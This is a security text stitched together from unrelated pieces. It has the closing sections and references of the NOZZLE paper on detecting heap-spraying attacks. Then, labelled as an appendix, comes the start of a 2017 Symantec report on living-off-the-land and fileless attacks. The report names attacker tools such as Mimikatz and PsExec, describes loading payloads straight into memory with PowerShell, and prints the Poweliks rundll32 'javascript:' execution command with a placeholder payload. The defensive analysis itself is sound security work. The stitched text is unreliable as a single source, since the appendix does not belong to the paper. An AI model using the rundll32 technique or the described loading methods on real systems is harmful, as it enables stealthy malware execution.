With JavaScript-based attacks, since JavaScript `Strings` are immutable, this is generally only possible using JavaScript `Arrays`. Further, because NOZZLE may not know when objects are completely initialized, it may scan them prematurely, creating another TOCTTOU window. To address this issue, NOZZLE scans objects once they mature on the assumption that most objects are written once when initialized, soon after they are allocated. In the future, we intend to investigate other ways to reduce this vulnerability, including periodically rescanning objects. Rescans could be triggered when NOZZLE observes a significant number of heap stores, perhaps by reading hardware performance counters.

Moreover, in the case of a garbage-collected language such as JavaScript or Java, NOZZLE can be integrated directly with the garbage collector. In this case, changes observed via GC *write barriers* [29] may be used to trigger NOZZLE scanning.

## 6.2 Interpretation Start Offset

In our discussion so far, we have interpreted the contents of objects as instructions starting at offset zero in the object, which allows NOZZLE to detect the current generation of heap-spraying exploits. However, if attackers are aware that NOZZLE is being used, they could arrange to fool NOZZLE by inserting junk bytes at the start of objects. There are several reasons that such techniques will not be as successful as one might think. To counter the most simplistic such attack, if there are invalid or illegal instructions at the beginning of the object, NOZZLE skips bytes until it finds the first valid instruction.

Note that while it may seem that the attacker has much flexibility to engineer the offset of the start of the malicious code, the attacker is constrained in several important ways. First, we know that it is likely that the attacker is trying to maximize the probability that the attack will succeed. Second, recall that the attacker has to corrupt a control transfer but does not know the specific address in an

object where the jump will land. If the jump lands on an invalid or illegal instruction, then the attack will fail. As a result, the attacker may seek to make a control transfer to every address in the malicious object result in an exploit. If this is the case, then NOZZLE will correctly detect the malicious code. Finally, if the attacker knows that NOZZLE will start interpreting the data as instructions starting at a particular offset, then the attacker might intentionally construct the sled in such a way that the induced instructions starting at one offset look benign, while the induced instructions starting at a different offset are malicious. For example, the simplist form of this kind of attack would have uniform 4-byte benign instructions starting at byte offset 0 and uniform malicious 4-byte instructions starting at byte offset 2. Note also that these overlapped sequences cannot share any instruction boundaries because if they did, then processing instructions starting at the benign offset would eventually discover malicious instructions at the point where the two sequences merged.

While the current version of NOZZLE does not address this specific simple case, NOZZLE could be modified to handle it by generating multiple control flow graphs at multiple starting offsets. Furthermore, because x86 instructions are typically short, most induced instruction sequences starting at different offsets do not have many possible interpretations before they share a common instruction boundary and merge. While it is theoretically possible for a determined attacker to create a non-regular, non-overlapping sequence of benign and malicious instructions, it is not obvious that the malicious sequence could not be discovered by performing object scans at a small number of offsets into the object. We leave an analysis of such techniques for future work.

## 6.3 Threshold Setting

The success of heap spraying is directly proportional to the density of dangerous objects in the program heap, which is approximated by NOZZLE's normalized attack surface metric. Increasing the number of sprayed malicious objects increases the attacker's likelihood of success, but at the same time, more sprayed objects will increase the likelihood that NOZZLE will detect the attack. What is worse for the attacker, failing attacks often result in program crashes. In the browser context, these are recorded on the user's machine and sent to browser vendors using a crash agent such as Mozilla Crash reporting [24] for per-site bucketing and analysis.

What is interesting about attacks against browsers is that from a purely financial standpoint, the attacker has a strong incentive to produce exploits with a high likelihood of success. Indeed, assuming the attacker is the one discovering the vulnerability such as a dangling pointer or buffer overrun enabling the heap-spraying attack, they can sell their finding directly to the browser maker. For instance, the Mozilla Foundation, the makers of Firefox, offers a cash reward of $500 for every exploitable vulnerability [25]. This represents a conservative estimate of the financial value of such an exploit, given that Mozilla is a non-profit and commercial browser makes are likely to pay more [15]. A key realization is that in many cases heap spraying is used for direct financial gain. A typical way to monetize a heap-spraying attack is to take over a number of unsuspecting users' computers and have them join a botnet. A large-scale botnet can be sold on the black market to be used for spamming or DDOS attacks.

According to some reports, to cost of a large-scale botnet is about $.10 per machine [40, 18]. So, to break even, the attacker has to take over at least 5,000 computers. For a success rate $\alpha$, in addition to 5,000 successfully compromised machines, there are $5,000 \times (1 - \alpha)/\alpha$ failed attacks. Even a success rate as high as 90%, the attack campaign will produce failures for 555 users. Assuming these result in crashes reported by the crash agent, this many reports from a single web site may attract attention of the browser maker. For a success rate of 50%, the browser make is likely to receive 5,000 crash reports, which should lead to rapid detection of the exploit!

As discussed in Section 5, in practice we use the relative threshold of 50% with Nozzle. We do not believe that a much lower success rate is financially viable from the standpoint of the attacker.

## 6.4 Targeted Jumps into Pages

One approach to circumventing NOZZLE detection is for the attacker to eliminate the large NOP sled that heap sprays typically use. This may be accomplished by allocating page-size chunks of memory (or multiples thereof) and placing the shellcode at fixed offsets on every page [39]. While our spraying detection technique currently will not discover such attacks, it is possible that the presence of possible shellcode at fixed offsets on a large number of user-allocated pages can be detected by extending NOZZLE, which we will consider in future work.

## 6.5 Confusing Control Flow Patterns

NOZZLE attempts to find basic blocks that act as sinks for random jumps into objects. One approach that will confuse NOZZLE is to include a large number of copies of shellcode in an object such that no one of them has a high surface area. Such an approach would still require that a high percentage of random jumps into objects result in non-terminating control flow, which might also be used as a trigger for our detector.

Even more problematic is an attack where the attacker includes inter-object jumps, under the assumption that,

probabilistically, there will be a high density of malicious objects and hence jumps outside of the current object will still land in another malicious object. NOZZLE currently assumes that jumps outside of the current object will result in termination. We anticipate that our control flow analysis can be augmented to detect groupings of objects with possible inter-object control flow, but we leave this problem for future work.

### 6.6 Summary

In summary, there are a number of ways that clever attackers can defeat NOZZLE's current analysis techniques. Nevertheless, we consider NOZZLE an important first step to detecting heap spraying attacks and we believe that improvements to our techniques are possible and will be implemented, just as attackers will implement some of the possible exploits described above.

The argument for using NOZZLE, despite the fact that hackers will find ways to confound it, is the same reason that virus scanners are installed almost ubiquitously on computer systems today: it will detect and prevent many known attacks, and as new forms of attacks develop, there are ways to improve its defenses as well. Ultimately, NOZZLE, just like existing virus detectors, is just one layer of a defense in depth.

## 7 Related Work

This section discusses exploit detection and memory attack prevention.

### 7.1 Exploit Detection

As discussed, a code injection exploit consists of at least two parts: the NOP sled and shellcode. Detection techniques target either or both of these parts. Signature-based techniques, such as Snort [33], use pattern matching, including possibly regular expressions, to identify attacks that match known attacks in their database. A disadvantage of this approach is that it will fail to detect attacks that are not already in the database. Furthermore, polymorphic malware potentially vary its shellcode on every infection attempt, reducing the effectiveness of pattern-based techniques. Statistical techniques, such as Polygraph [27], address this problem by using improbable properties of the shellcode to identify an attack.

The work most closely related to NOZZLE is Abstract Payload Execution (APE), by Toth and Kruegel [43], and STRIDE, by Akritidis et al. [4, 30], both of which present methods for NOP sled detection in network traffic. APE examines sequences of bytes using a technique they call *abstract execution* where the bytes are considered valid and correct if they represent processor instructions with legal memory operands. APE identifies sleds by computing the execution length of valid and correct sequences, distinguishing attacks by identifying sufficiently long sequences.

The authors of STRIDE observe that by employing jumps, NOP sleds can be effective even with relatively short valid and correct sequences. To address this problem, they consider all possible subsequences of length $n$, and detect an attack only when all such subsequences are considered valid. They demonstrate that STRIDE handles attacks that APE does not, showing also that tested over a large corpus or URIs, their method has an extremely low false positive rate. One weakness of this approach, acknowledged by the authors is that "...a worm writer could blind STRIDE by adding invalid instruction sequences at suitable locations..." ([30], p. 105).

NOZZLE also identifies NOP sleds, but it does so in ways that go beyond previous work. First, prior work has not considered the specific problem of sled detection in heap objects or the general problem of heap spraying, which we do. Our results show that applying previous techniques to heap object results in high false positive rates. Second, because we target heap spraying specifically, our technique leverages properties of the entire heap and not just individual objects. Finally, we introduce the concept of surface area as a method for prioritizing the potential threat of an object, thus addressing the STRIDE weakness mentioned above.

### 7.2 Memory Attack Prevention

While NOZZLE focuses on detecting heap spraying based on object and heap properties, other techniques take different approaches. Recall that heap spraying requires an additional memory corruption exploit, and one method of preventing a heap-spraying attack is to ignore the spray altogether and prevent or detect the initial corruption error. Techniques such as control flow integrity [1], write integrity testing [3], data flow integrity [9], and program shepherding [17] take this approach. Detecting all such possible exploits is difficult and, while these techniques are promising, their overhead has currently prevented their widespread use.

Some existing operating systems also support mechanisms, such as Data Execution Prevention (DEP) [21], which prevent a process from executing code on specific pages in its address space. Implemented in either software or hardware (via the no-execute or "NX" bit), execution protection can be applied to vulnerable parts of an address space, including the stack and heap. With DEP turned on, code injections in the heap cannot execute.

While DEP will prevent many attacks, we believe that NOZZLE is complementary to DEP for the following rea-

sons. First, security benefits from defense-in-depth. For example, attacks that first turn off DEP have been published, thereby circumventing its protection [37]. Second, compatibility issues can prevent DEP from being used. Despite the presence of NX hardware and DEP in modern operating systems, existing commercial browsers, such as Internet Explorer 7, still ship with DEP disabled by default [13]. Third, runtime systems that perform just-in-time (JIT) compilation may allocate JITed code in the heap, requiring the heap to be executable. Finally, code injection spraying attacks have recently been reported in areas other than the heap where DEP cannot be used. Sotirov and Dowd describe spraying attacks that introduce exploit code into a process address space via embedded .NET User Controls [42]. The attack, which is disguised as one or more .NET managed code fragments, is loaded in the process text segment, preventing the use of DEP. In future work, we intend to show that NOZZLE can be effective in detecting such attacks as well.

# 8 Conclusions

We have presented NOZZLE, a runtime system for detecting and preventing heap-spraying security attacks. Heap spraying has the property that the actions taken by the attacker in the spraying part of the attack are legal and type safe, allowing such attacks to be initiated in JavaScript, Java, or C#. Attacks using heap spraying are on the rise because security mitigations have reduced the effectiveness of previous stack and heap-based approaches.

NOZZLE is the first system specifically targeted at detecting and preventing heap-spraying attacks. NOZZLE uses lightweight runtime interpretation to identify specific suspicious objects in the heap and maintains a global heap health metric to achieve low false positive and false negative rates, as measured using 12 published heap spraying attacks, 2,000 synthetic malicious exploits, and 150 highly-visited benign web sites. We show that with sampling, the performance overhead of NOZZLE can be reduced to 7%, while maintaining low false positive and false negative rates. Similar overheads are observed when NOZZLE is applied to Adobe Acrobat Reader, a recent target of heap spraying attacks. The fact that NOZZLE was able to thwart a real published exploit when applied to the Adobe Reader binary, without requiring any modifications to our instrumentation techniques, demonstrates the generality of our approach.

While we have focused our experimental evaluation on heap-spraying attacks exclusively, we believe that the our techniques are more general. In particular, in future work, we intend to investigate using our approach to detect a variety of exploits that use code masquarading as data, such as images, compiled bytecode, etc. [42].

In the future, we intend to further improve the selectivity of the NOZZLE local detector, demonstrate NOZZLE's effectiveness for attacks beyond heap spraying, and further tune NOZZLE's performance. Because heap-spraying attacks can be initiated in type-safe languages, we would like to evaluate the cost and effectiveness of incorporating NOZZLE in a garbage-collected runtime. We are also interested in extending NOZZLE from detecting heap-spraying attacks to tolerating them as well.

# Acknowledgements

We thank Emery Berger, Martin Burtscher, Silviu Calinoiu, Trishul Chilimbi, Tal Garfinkel, Ted Hart, Karthik Pattabiraman, Patrick Stratton, and Berend-Jan "SkyLined" Wever for their valuable feedback during the development of this work. We also thank our anonymous reviewers for their comments.

# References

[1] M. Abadi, M. Budiu, Úlfar Erlingsson, and J. Ligatti. Control-flow integrity. In *Proceedings of the Conference on Computer and Communications Security*, pages 340–353, 2005.

[2] A. V. Aho, M. Lam, R. Sethi, and J. D. Ullman. *Compilers: Principles, Techniques, and Tools*. Addison-Wesley, 2007.

[3] P. Akritidis, C. Cadar, C. Raiciu, M. Costa, and M. Castro. Preventing memory error exploits with WIT. In *Proceedings of the IEEE Symposium on Security and Privacy*, pages 263–277, 2008.

[4] P. Akritidis, E. P. Markatos, M. Polychronakis, and K. G. Anagnostakis. STRIDE: Polymorphic sled detection through instruction sequence analysis. In R. Sasaki, S. Qing, E. Okamoto, and H. Yoshiura, editors, *Proceedings of Security and Privacy in the Age of Ubiquitous Computing*, pages 375–392. Springer, 2005.

[5] Alexa Inc. Global top sites. `http://www.alexa.com/site/ds/top_sites`, 2008.

[6] Arr1val. Exploit made by Arr1val proved in Adobe 9.1 and 8.1.4 on Linux. `http://downloads.securityfocus.com/vulnerabilities/exploits/34736.txt`, Feb. 2009.

[7] E. D. Berger and B. G. Zorn. DieHard: probabilistic memory safety for unsafe languages. In *Proceedings of the Conference on Programming Language Design and Implementation*, pages 158–168, 2006.

[8] S. Bhatkar, D. C. DuVarney, and R. Sekar. Address obfuscation: An efficient approach to combat a broad range of memory error exploits. In *Proceedings of the 12th USENIX Security Symposium*, pages 105–120. USENIX, Aug. 2003.

[9] M. Castro, M. Costa, and T. Harris. Securing software by enforcing data-flow integrity. In *Proceedings of the Symposium on Operating Systems Design and Implementation*, pages 147–160, 2006.

[10] C. Cowan, P. Wagle, C. Pu, S. Beattie, and J. Walpole. Buffer overflows: attacks and defenses for the vulnerability of the decade. *Foundations of Intrusion Tolerant Systems*, pages 227–237, 2003.

[11] ECMA. ECMAScript language specification. `http://www.ecma-international.org/publications/files/ECMA-ST/Ecma-262.pdf`, 1999.

[12] J. C. Foster. *Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research*. Syngress Publishing, 2007.

[13] M. Howard. Update on Internet Explorer 7, DEP, and Adobe software. `http://blogs.msdn.com/michael_howard/archive/2006/12/12/update-on-internet-explorer-7-dep-and-adobe-software.aspx`, 2006.

[14] G. Hunt and D. Brubacher. Detours: Binary interception of Win32 functions. In *In Proceedings of the USENIX Windows NT Symposium*, pages 135–143, 1999.

[15] iDefense Labs. Annual vulnerability challenge. `http://labs.idefense.com/vcp/challenge.php`, 2007.

[16] I.-K. Kim, K. Kang, Y. Choi, D. Kim, J. Oh, and K. Han. A practical approach for detecting executable codes in network traffic. In S. Ata and C. S. Hong, editors, *Proceedings of Managing Next Generation Networks and Services*, volume 4773 of *Lecture Notes in Computer Science*, pages 354–363. Springer, 2007.

[17] V. Kiriansky, D. Bruening, and S. P. Amarasinghe. Secure execution via program shepherding. In *Proceedings of the USENIX Security Symposium*, pages 191–206, 2002.

[18] J. Leyden. Phatbot arrest throws open trade in zombie PCs. `http://www.theregister.co.uk/2004/05/12/phatbot_zombie_trade`, May 2004.

[19] B. Livshits and W. Cui. Spectator: Detection and containment of JavaScript worms. In *Proceedings of the USENIX Annual Technical Conference*, pages 335–348, June 2008.

[20] A. Marinescu. Windows Vista heap management enhancements. In *BlackHat US*, 2006.

[21] Microsoft Corporation. Data execution prevention. `http://technet.microsoft.com/en-us/library/cc738483.aspx`, 2003.

[22] Microsoft Corporation. Microsoft Security Bulletin MS07-017. `http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx`, Apr. 2007.

[23] Microsoft Corporation. Microsoft Security Advisory (961051). `http://www.microsoft.com/technet/security/advisory/961051.mspx`, Dec. 2008.

[24] Mozilla Developer Center. Crash reporting page. `https://developer.mozilla.org/En/Crash_reporting`, 2008.

[25] Mozilla Security Group. Mozilla security bug bounty program. `http://www.mozilla.org/security/bug-bounty.html`, 2004.

[26] Multi-State Information Sharing and Analysis Center. Vulnerability in Adobe Reader and Adobe Acrobat could allow remote code execution. `http://www.msisac.org/advisories/2009/2009-008.cfm`, Feb. 2009.

[27] J. Newsome, B. Karp, and D. Song. Polygraph: Automatically generating signatures for polymorphic worms. In *Proceedings of the IEEE Symposium on Security and Privacy*, pages 226–241, 2005.

[28] J. D. Pincus and B. Baker. Beyond stack smashing: Recent advances in exploiting buffer overruns. *IEEE Security and Privacy*, 2(4):20–27, 2004.

[29] P. P. Pirinen. Barrier techniques for incremental tracing. In *Proceedings of the International Symposium on Memory Management*, pages 20–25, 1998.

[30] M. Polychronakis, K. G. Anagnostakis, and E. P. Markatos. Emulation-based detection of non-self-contained polymorphic shellcode. In *Proceedings of Symposium on Recent Advances in Intrusion Detection*, pages 87–106, 2007.

[31] M. Polychronakis, K. G. Anagnostakis, and E. P. Markatos. Network-level polymorphic shellcode detection using emulation. *Journal in Computer Virology*, 2(4):257–274, 2007.

[32] P. Ratanaworabhan, B. Livshits, and B. Zorn. Nozzle: A defense against heap-spraying code injection attacks. Technical Report MSR-TR-2008-176, Microsoft Research, Nov. 2008.

[33] M. Roesch. Snort - lightweight intrusion detection for networks. In *Proceedings of the USENIX conference on System administration*, pages 229–238, 1999.

[34] Samy. The Samy worm. `http://namb.la/popular/`, Oct. 2005.

[35] B. Schwarz, S. Debray, and G. Andrews. Disassembly of executable code revisited. *Reverse Engineering, 2002. Proceedings. Ninth Working Conference on*, pages 45–54, 2002.

[36] H. Shacham, M. Page, B. Pfaff, E.-J. Goh, N. Modadugu, and D. Boneh. On the effectiveness of address-space randomization. In *Proceedings of the Conference on Computer and Communications Security*, pages 298–307, 2004.

[37] Skape and Skywing. Bypassing windows hardware-enforced DEP. *Uninformed Journal*, 2(4), Sept. 2005.

[38] SkyLined. Internet Explorer IFRAME src&name parameter BoF remote compromise. `http://skypher.com/wiki/index.php?title=Www.edup.tudelft.nl/~bjwever/advisory/_iframe.html.php`, 2004.

[39] SkyLined. Personal communication, 2009.

[40] Sophos Inc. Stopping zombies, botnets and other email- and web-borne threats. `http://blogs.piercelaw.edu/tradesecretsblog/SophosZombies072507.pdf`, 12 2006.

[41] A. Sotirov. Heap feng shui in JavaScript. In *Proceedings of Blackhat Europe*, 2007.

[42] A. Sotirov and M. Dowd. Bypassing browser memory pro-

tections. In *Proceedings of BlackHat*, 2008.

[43] T. Toth and C. Krügel. Accurate buffer overflow detection via abstract payload execution. In *Proceedings of Symposium on Recent Advances in Intrusion Detection*, pages 274–291, 2002.

[44] R. van den Heetkamp. Heap spraying. `http://www.0x000000.com/index.php?i=412&bin=110011100`, Aug. 2007.

[45] Y.-M. Wang, D. Beck, X. Jiang, R. Roussev, C. Verbowski, S. Chen, and S. King. Automated web patrol with Strider HoneyMonkeys: Finding web sites that exploit browser vulnerabilities. In *Proceedings of the Symposium on Network and Distributed Systems Security (NDSS 2006)*, Feb. 2006.

# APPENDIX Y

Internet Security Threat Report

# ISTR

# Living off the land and fileless attack techniques

## An ISTR Special Report

Analyst: Candid Wueest
Contributor: Himanshu Anand

July 2017

Contents

Executive summary, key findings, and introduction

Living off the land

Defining fileless attack methods

Prevalence of dual-use tools

Dual-use tools in targeted attacks

Conclusion

Symantec™

# Contents

3 **Executive summary, key findings, and introduction**

6 **Living off the land**

9 **Defining fileless attack methods**

10 Memory only attacks

10 Fileless persistence methods

11 Windows registry

12 Windows Management Instrumentation

12 Group Policy Objects

13 Scheduled task

13 Call back on shutdown

13 Infect existing files

13 Non-PE file attacks

15 Dual-use tools

16 Example: Ransom.Petya

17 System configuration

17 Hardware assisted attacks

18 **Prevalence of dual-use tools**

21 **Dual-use tools in targeted attacks**

25 **Conclusion**

28 Best Practice

29 About Symantec

29 More Information

## Figures and Tables

8 Figure 1. Typical living off the land attack chain

11 Figure 2. Poweliks load process

12 Figure 3. JScript inside malicious SCT file

12 Figure 4. WMI consumer that starts PowerShell

14 Figure 5. Word document with embedded malware

14 Figure 6. Top 7 malicious file types seen in email, January-May 2017

15 Figure 7. Monthly detections of script downloaders

16 Table 1. Dual-use tools, grouped by purpose

19 Table 2. Usage of dual-use tools, January 2017

20 Figure 8. PsExec and Mimikatz plus WCE usage

20 Figure 9. Usage of dual-use tools in 2017

20 Figure 10. Percentage of malware using WMI

22 Table 3. Some of the typical tools used by attack groups

23 Table 4. Examples of system tools used for information gathering

24 Table 5. List of dual-use tools used by the Odinaff attack group

Symantec™

# Executive summary, key findings, and introduction

Section

00

Symantec™

## Executive summary

"Living off the land" is one clear trend in targeted cyber attacks at the moment. Attackers are increasingly making use of tools already installed on targeted computers or are running simple scripts and shellcode directly in memory. Creating less new files on the hard disk means less chance of being detected by traditional security tools and therefore minimizes the risk of an attack being blocked.

Malicious scripts are hidden inside the registry or Windows Management Instrumentation (WMI) in order to achieve a stealthy fileless persistence method on a compromised computer. System and dual-use tools are frequently used in order to gather information about a freshly compromised system. These tools have also been used during lateral movement or to exfiltrate stolen data. This activity blends in with normal system administration work.

Attackers are reverting back to these simple but proven methods, as it is getting more cost intensive to find reliably exploitable vulnerabilities. Often a spear-phishing attack with some social engineering can be just as successful at achieving the attackers' goals.

The four main categories of living off the land and fileless attack techniques are: memory-only threats, fileless persistence, dual-use tools, and non-PE file attacks.

Cyber criminals are adopting these tactics to spread threats like ransomware and financial Trojans but nation-state targeted attack groups also make use of them. Recent attacks by the Calicum/Fin7 group against restaurants in the U.S. has shown how effective these tactics can be. Symantec expects the trend of living off the land and fileless threats to continue to grow.

## Key findings

- Dual-use tools are ubiquitous, which means an attacker can hide in plain sight
- Attackers revert to simple methods, as finding exploitable zero-day vulnerabilities is getting more difficult
- The use of off-the-shelf tools and cloud services makes it difficult to determine intent and attribution of an attack
- The four categories of living off the land threats are memory-only threats, fileless persistence, dual-use tools, and non-PE file attacks
- The most common dual-use tool in 2017 was sc.exe, observed on 2.7 percent of monitored systems
- Two percent of all malware submitted to our sandbox in 2016 misused WMI
- Remote administration tools, such as VNC, were used on 2.1 percent of all monitored computers
- Stealing credentials and using them for lateral movement is very common
- Macros are not always needed in order to execute an embedded malicious payload from a document
- Living off the land and fileless attacks are commonly used by targeted attack groups
- 10 out of 10 analyzed targeted attack groups used system tools as well as custom built tools
- Pure application whitelisting will not prevent the misuse of dual-use tools
- Embedding malicious scripts in the registry is the most common fileless persistence method, seen on around 5,000 computers per day
- Targeted attack groups are becoming less concerned about load points and persistence
- So far in 2017 we have blocked around 4,000 Trojan.Kotver attacks per day on endpoints
- Legitimate cloud services are used to exfiltrate stolen data

## Introduction

There has been a growing interest in fileless infection techniques over the past few years. Fileless malware is not a new concept. For example, the Code Red worm, which first appeared in 2001, resided solely in memory and did not write any files to disk. In 2014 there was yet another spike of fileless attacks, this time with fileless persistence methods used by threats such as Trojan.Poweliks which resides completely in the registry.

We have observed an increase in attackers utilizing living off the land tactics, where they use whatever tools are already installed on the targeted system. They try to drop as few files as possible in order to avoid detection. Only using clean system tools, and not having a malicious binary file on disk that could be scanned, means that some traditional security measures will not be able to detect and block the attack. Hence, a comprehensive protection strategy is needed to defend against these attacks. Memory only attacks are also more difficult to analyze forensically in the aftermath of a breach. Some attackers are using anti-forensic tools, like the simple sdelete.exe, to wipe any files that are dropped. In these cases only newer endpoint detection and response (EDR) solutions will be able to record any traces of the attack.

Hiding malware on the hard disk has always been a goal of attackers as the less artifacts present, the less that can be detected. In the past we have seen obfuscated file infectors, the use of alternative data stream (ADS) on NTFS or inside RAR files, and even the new WofCompressed streams in Windows 10 being used to hide files from forensic analysis.

Unfortunately it is not difficult to conduct fileless attacks. Frameworks like Metasploit provide many fileless infection options, such as reflective DLL injection. Msfvenom, a part of the Metasploit framework, is a standalone tool that can generate different payloads, and it also supports script outputs like PowerShell. Dedicated PowerShell tools such as Nishang and Powersploit also contribute to the wide distribution of script based and fileless attacks.

As there is a bit of a confusion on what is meant by living off the land and fileless attacks, we will explain the terms with recent examples.

Internet Security Threat Report

# Living off the land



Section

# 01

Symantec™

## Living off the land

The techniques used by attackers have shown one clearly visible trend over the last number of years: the so called living off the land approach has gained in popularity. Attackers using this approach use trusted off-the-shelf and preinstalled system tools to conduct their attacks. Many of these tools are ubiquitous and used by system administrators for legitimate work. This makes it harder for defenders to completely block access to these programs and allows the attackers to hide in plain sight. Even when log files are generated it can be difficult to spot anomalies. The use of system tools and common cloud services for data exfiltration does not often ring alarm bells. Even in the event that an attack is discovered, the living off the land approach makes it difficult to attribute the attack to a specific attack group as all groups use similar techniques and tools.

Furthermore, with the increase in usage of anti-exploitation features such as data execution prevention (DEP), address space layout randomization (ASLR), control-flow integrity (CFI), and Anti-ROP, it has become harder for attackers to find new reliably exploitable vulnerabilities. As it takes longer to find exploits, it makes them more expensive to use. Hence many attackers revert back to simple and proven methods such as spear-phishing emails and social engineering, where no exploits are needed.

Using just pre-existing system tools and a handful of clean off-the shelf applications is enough to conduct extremely damaging activities, including stealing sensitive data, crippling computers, or allowing remote access. The resulting attacks are simple but nevertheless successful and devastating.

Similar attack methods are quite common on Unix systems, where most of the work is done by command line tools. Python, Perl, or Bash scripts, together with system binaries, can provide all the functionality that an attacker needs on a Unix computer. However, the focus for this paper is on Windows systems.

## Definitions

We will refer to living off the land if only pre-installed software is used and no additional binary executables are installed onto the system by the attacker.

Documents with macros, VB scripts, PowerShell scripts, or the use of system commands, such as netsh commands, all fall under the living off the land specification. The same is true for memory only shellcode dropped by an exploit, which does not write any files on disk, and attackers brute forcing the password for Remote Desktop Protocol (RDP) access.

When dual-use tools, especially tools such as Mimikatz or Pwdump, are downloaded it will not be referred to as living off the land but rather as the utilization of dual-use tools.

The typical attack chain using the living off the land method:

**Incursion**
This could be achieved by exploiting a remote code execution (RCE) vulnerability to run shell code directly in memory. More commonly it is an email with a malicious script inside a document or hidden in another host file such as a LNK file. The threat may implement multiple stages with downloader or self-decrypting parts, each of which might follow living off the land techniques again. Another method is misusing system tools by simply logging in with a stolen or guessed password.

**Persistence**
Once the computer is compromised, stage two may or may not be fileless in regards to the persistence method. The threat may also not to be persistent at all, depending on what the end goal is for the attacker.

**Payload**
The payload of the threat often makes use of dual-use tools.

## Typical living off the land attack chain

### 1. INCURSION

This could be achieved by exploiting a remote code execution (RCE) vulnerability to run shell code directly in memory. More commonly it is an email with a malicious script inside a document or hidden in another host file such as a LNK file. The threat may implement multiple stages with downloader or self-decrypting parts, each of which might follow living off the land techniques again. Another method is misusing system tools by simply logging in with a stolen or guessed password.

- Exploit in memory e.g. SMB EternalBlue
- Email with Non-PE file e.g. Document macro
- Remote script dropper e.g. LNK with Powershell from cloud storage
- Weak or stolen credentials e.g. RDP password guess

### 2. PERSISTENCE

Once the computer is compromised, stage two may or may not be fileless in regards to the persistence method. The threat may also not to be persistent at all, depending on what the end goal is for the attacker.

**Non-persistent**

- Memory only malware e.g. SQL slammer

**Persistent**

- Fileless persistence Loadpoint e.g. JScript in registry
- Regular non-fileless method

### 3. PAYLOAD

The payload of the threat often makes use of dual-use tools.

- Dual-use tools e.g. netsh PsExec.exe
- Memory only payload e.g. Mirai DDoS
- Non-PE file payload e.g. PowerShell script
- Regular non-fileless payload

# Defining fileless attack methods



Section

# 02

Symantec™

## Defining fileless attack methods

When talking about living off the land people often also talk about fileless attacks and there are various aspects which are often mixed up or used in the wrong context. Some people mean non-portable-executable (non-PE) files such as scripts, some talk about fileless load points in the registry, and for others fileless attacks are memory only threats like SQL Slammer. Strictly speaking not all of these threats are fileless, as the Windows registry is also stored on disk and some threats may create temporary files.

Sometimes fileless attacks are referred to as non-malware or malware-free attacks; for example when only dual-use tools are used and no malware binary is dropped. Of course this is not really fileless either, as a file is involved, namely one or more benign system tools. The point is that such attacks do not drop a custom built malware binary but they may drop greyware tools or scripts. You could also call these attacks asymptomatic, as they do not exhibit the usual symptoms people would expect from an infection, like a malicious file on disk.

As you can see, not all of these attack techniques can be classified as living off the land. Many attacks use at least one file at some stage and are therefore falsely referred to as fileless. It could be that an attack started off with a dropper malware but then removed its files at a later stage. Hence, after the initial infection took place no new binary executables are left on disk. In light of clear communication we will refer to this as an attack that uses a fileless attack technique during one part of the attack wave.

For easier understanding and clarity of meaning, we will distinguish and discuss the following categories:

- **Memory only threats**, such as SQL Slammer
- **Fileless persistence**, such as VBS in the registry
- **Dual-use tools**, such as psExec.exe, which are used by the attacker
- **Non-PE file attacks**, such as Office documents with macros or scripts

### Memory only attacks

Code Red in 2001 was the first widespread memory only worm. Later in 2003 came the SQL Slammer worm. Both worms exploited vulnerabilities in services in Windows in order to execute their payload directly in memory, making them examples of true fileless attacks. A more recent example was the EternalBlue exploit used to deploy the DoublePulsar backdoor, both of which were used by the WannaCry ransomware. Whenever the attackers are exploiting remote code execution vulnerabilities, there is a high chance that the shellcode can load the payload directly into memory and run it from there without dropping any files. Of course we have also observed this behavior in web attack toolkits. For example, the popular Angler exploit kit was seen in 2014 executing Trojan.Snifula directly from memory. The shellcode loads the binary payload into memory and runs it, without writing it to disk.

These infections are not persistent by themselves and a restart will disinfect the computer. But we have noticed that many attackers do not care about persistence anymore. Simple worms like the Mirai bot, which compromised IoT devices, know that a system cleaned through a restart will soon be re-infected again if it does not get patched. Targeted attack groups on the other hand know that core servers are not frequently restarted, which gives them plenty of time to find whatever they are looking for without leaving any traces in load points on disk.

In attacks without shellcode execution, PowerShell can be used to download a payload directly to memory with the WebClient.DownloadString method and run another script command or use reflective load on a DLL from memory to load common malware. However, this requires a malicious script to be run first somehow or that the credentials are known and remote PowerShell invocation is enabled.

Symantec realized shortly after the Code Red worm that memory only malware had huge potential for use in dangerous attacks and would become more common. In order to protect our customers from such attacks we implemented various proactive techniques into our software over the years, from heuristic based memory scanning to memory exploit mitigation (MEM) techniques like anti-ROP.

### Fileless persistence methods

There are various methods available to attackers that allow them to gain a persistent foothold on a Windows computer without dropping the malicious payload directly onto disk. This usually requires that malicious code is already running on the compromised computer in the post-infection phase. Depending on how the incursion is achieved, it might involve a file for that early stage. Regardless of this, it is possible to detect and block the incursion and prevent any load points from being created at all.

The attacker's goal is to make detection on the compromised system as difficult as possible for the defender. With a plentitude of available features there are many ways to have fileless load points within Windows. We only mention the most commonly observed methods but others such as Bitsadmin, AT, or COM object hijacking

should be kept in mind as well. Of course similar behavior can be done on other operating systems like, for example, with a simple cron job on a Unix system. The following are the most common methods observed in the wild.

**Windows registry**

The most popular fileless load point mechanism is storing a malicious script in the Windows registry. Trojan.Poweliks evolved into such a registry based threat in 2014, making heavy use of this method. Later Trojan.Kotver and Trojan.Bedep utilized the same method extensively. After that more attackers started to use this method for their load points. So far in 2017 we have blocked around 4,000 Trojan.Kotver attacks per day on endpoints.

Poweliks uses the registry for persistence and achieves this through the use of embedded JavaScript. Normally, malware will place an entry in the registry run subkey that points to a malicious executable, which is then executed when the system starts. In the case of Powelikes the complete malware is contained in the registry and extracted and run on the fly. In addition to this, Poweliks creates a registry run key with a non-ASCII character as a name. This prevents normal tools from being able to display this value, adding additional obfuscation. The threat also modifies access rights, making the key difficult to remove. The content is spread over multiple keys and obfuscated so that each infection will have a different value blob. This is sometimes referred to as registry resident malware.

The main content of the Poweliks registry run key is a call to rundll32 with a specially crafted argument.

A normal call to rundll32 takes in the following arguments:

```
RUNDLL32.EXE <dll name>,<entry point> <optional
arguments>
```

The value used by the threat looks like this:

```
rundll32.exe javascript:"\..\
mshtml,RunHTMLApplication ";alert('payload');
```

